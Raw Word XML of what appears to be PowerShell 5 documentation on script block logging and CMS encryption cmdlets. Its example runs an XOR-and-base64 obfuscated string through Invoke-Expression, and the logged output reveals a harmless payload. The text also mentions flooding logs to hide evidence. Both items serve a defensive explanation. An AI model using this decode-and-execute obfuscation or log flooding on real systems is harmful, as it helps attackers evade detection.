        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>]::</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>GetString(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$bytes</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$decrypted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>SuperDecrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="8B0000"/>
        </w:rPr>
        <w:t>"FUIwQitCNkInQm9CCkItQjFCNkJiQmVCEkI1QixCJkJlQg=="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$decrypted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00A72BCD" w:rsidP="00B60C36">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B60C36">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Running this generates the following log entries:</w:t>
      </w:r>
      <w:r w:rsidR="00B60C36">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Compiling Scriptblock text (1 of 1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        function SuperDecrypt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            param($script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            $bytes = [Convert]::FromBase64String($script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            ## XOR "encryption"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            $xorKey = 0x42</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            for($counter = 0; $counter -lt $bytes.Length; $counter++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                $bytes[$counter] = $bytes[$counter] -bxor $xorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            [System.Text.Encoding]::Unicode.GetString($bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        ScriptBlock ID: ad8ae740-1f33-42aa-8dfc-1314411877e3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Compiling Scriptblock text (1 of 1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        $decrypted = SuperDecrypt "FUIwQitCNkInQm9CCkItQjFCNkJiQmVCEkI1QixCJkJlQg=="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        ScriptBlock ID: ba11c155-d34c-4004-88e3-6502ecb50f52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Compiling Scriptblock text (1 of 1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Invoke-Expression $decrypted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        ScriptBlock ID: 856c01ca-85d7-4989-b47f-e6a09ee4eeb3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Compiling Scriptblock text (1 of 1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Write-Host 'Pwnd'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRPr="007177D4" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="es-US" w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007177D4">
        <w:rPr>
          <w:lang w:val="es-US" w:bidi="en-US"/>
        </w:rPr>
        <w:t>ScriptBlock ID: 5e618414-4e77-48e3-8f65-9a863f54b4c8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRPr="007177D4" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES" w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>If the script block length exceeds what ETW is capable of holding in a single event, Windows PowerShell breaks the script into multiple parts. Here is sample code to recombine a script from its log messages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$created</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>Get-WinEvent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>-FilterHashtable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ProviderName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="8B0000"/>
        </w:rPr>
        <w:t>"Microsoft-Windows-PowerShell"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; Id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>4104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> } | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">Where-Object </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00587E43">
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>Criteria</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$sortedScripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$created</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>Properties</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
      <w:r>
        <w:t>Value }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$mergedScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>-join</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$sortedScripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>Properties</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
      <w:r>
        <w:t>Value })</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">As with all logging systems that have a limited retention buffer (i.e.: ETW logs), one attack against this infrastructure is to flood the log with spurious events to hide earlier evidence. To protect yourself from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">this attack, ensure that you have some form of event log collection set up (i.e.: Windows Event Forwarding, </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="006E6771">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:bidi="en-US"/>
          </w:rPr>
          <w:t>http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>) to move event logs off of the computer as soon as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00141DD8"/>
    <w:p w:rsidR="005D400F" w:rsidRDefault="005D400F" w:rsidP="006174D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Ref416043963"/>
      <w:r>
        <w:t>Cryptographic Message Syntax (CMS) encryption and decryption cmdlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="00B53467" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>PowerShell version 5</w:t>
      </w:r>
      <w:r w:rsidR="00430F50">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00430F50">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00430F50" w:rsidRPr="00A339D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>KB 3000850</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F50">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">introduces support for protection of content using the </w:t>
      </w:r>
      <w:r w:rsidRPr="008400F8">
        <w:rPr>
          <w:i/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Cryptographic Message Syntax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CMS) format. </w:t>
      </w:r>
      <w:r w:rsidR="00226A9E">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">These </w:t>
      </w:r>
      <w:r w:rsidR="006A76A5">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cmdlets support encryption and decryption of content using the IETF standard format for cryptographically protecting messages as documented by </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="006A76A5" w:rsidRPr="00F42702">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:bidi="en-US"/>
          </w:rPr>
          <w:t>RFC5652</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006A76A5">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-CmsMessage [-Content] &lt;string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-CmsMessage [-Path] &lt;string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
